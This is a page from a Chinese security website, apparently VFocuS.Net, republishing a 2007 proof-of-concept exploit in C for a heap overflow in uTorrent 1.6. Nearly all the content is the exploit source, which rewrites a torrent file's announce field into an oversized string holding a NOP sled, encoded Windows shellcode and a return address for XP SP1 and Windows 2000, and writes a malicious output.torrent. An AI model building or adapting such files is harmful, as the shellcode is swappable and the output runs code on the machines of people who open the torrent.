首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 uTorrent 1.6 Remote Heap Overflow Exploit PoC 来源：http://www.defacedsecurity.com 作者：defsec 发布时间：2007-02-13   /* * This is a PoC remote exploit for uTorrent 1.6 * * Author: * defsec <defacedsecurity@hotmail.com> * http://www.defacedsecurity.com * * * Works on XP SP1 and  w2k sp1-4 * */ #include <stdio.h> #include <stdlib.h> #define NASIZE 4880 unsigned char nice_announce[NASIZE]; unsigned char xorops[]="\x33\xc0\x33\xdb"; // win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum // Restricted Character 0x00 unsigned char shellcode[]= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47" "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48" "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58" "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38" "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54" "\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48" "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53" "\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37" "\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a" "\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b" "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53" "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37" "\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49" "\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46" "\x4e\x46\x43\x46\x42\x30\x5a"; //msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4 unsigned char jmptosc[] = "\xeb\x04\ \xa7\x2c\xc2\x77\ \x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3"; int main(int argc,char *argv[]) { FILE * pFile; long lSize; char * buffer; size_t result; long i = 0; long j = 0; long lPtrIndex; long lHeadSize; long lTailSize; char * curptr; char * alptr; char * torrentTail; if (argc < 2) { printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]"); printf("\n\nUsage: "); printf("%s",argv[0]); printf(" <TorrentFile>\n"); return 0; } pFile = fopen (argv[1],"rb"); if (pFile==NULL) { fputs ("File error",stderr); return 0; } // obtain file size: fseek (pFile ,0,SEEK_END); lSize = ftell (pFile); rewind (pFile); // allocate memory to contain the whole file: buffer = (char*) malloc (sizeof(char)*lSize); if (buffer == NULL) { fputs ("Memory error",stderr); return 0; } // copy the file into the buffer: result = fread (buffer,1,lSize,pFile); if (result != lSize) { fputs ("Reading error",stderr); return 0; } fclose (pFile); /* find announce / announce-list and erase it */ alptr = (char *) strstr(buffer,"announce"); if (alptr == NULL) { printf("\ninvalid torrent file"); return 0; } curptr = (char *) strstr(alptr, "7:comment"); lHeadSize = curptr - buffer ; lTailSize = lSize - lHeadSize; torrentTail = (char *) malloc (sizeof(char)*lTailSize); memcpy(torrentTail,curptr,lTailSize); /* generate offending header */ strcpy(nice_announce,"d8:announce4864:"); for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++) nice_announce[lPtrIndex] = 0x90; lPtrIndex = 84; memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1); lPtrIndex += sizeof(xorops) -1; memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1); for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++) nice_announce[lPtrIndex] = jmptosc[i]; /* get head and tail together into a file */ curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize)); for (i=0;i<NASIZE;i++) curptr[i] = nice_announce[i]; for (;i<(NASIZE+lTailSize);i++,j++) curptr[i] = torrentTail[j]; /* write to file and exit */ pFile = fopen ( "output.torrent" , "wb" ); if (pFile==NULL) { fputs ("File error",stderr); return 0; } fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile); fclose (pFile); return 1337; //:) }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·SunOS 5.10/5.11 in.telnetd Rem ·Microsoft Visual Studio 64-bit ·AT Contenator <= v1.0 (Root_To ·SAP Web Application Server 6.4 ·Xaran Cms <= 2.0 (xarancms_hau ·Axigen <= 2.0.0b1 Remote Denia ·phpCC <= 4.2 beta (nickpage.ph ·Axigen <= 2.0.0b1 Remote Denia ·Advanced Poll <= 2.0.5-dev Rem ·LushiWarPlaner 1.0 (register.p ·Lotus Domino <= R6 Webmail Rem ·LushiNews <= 1.01 (comments.ph   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved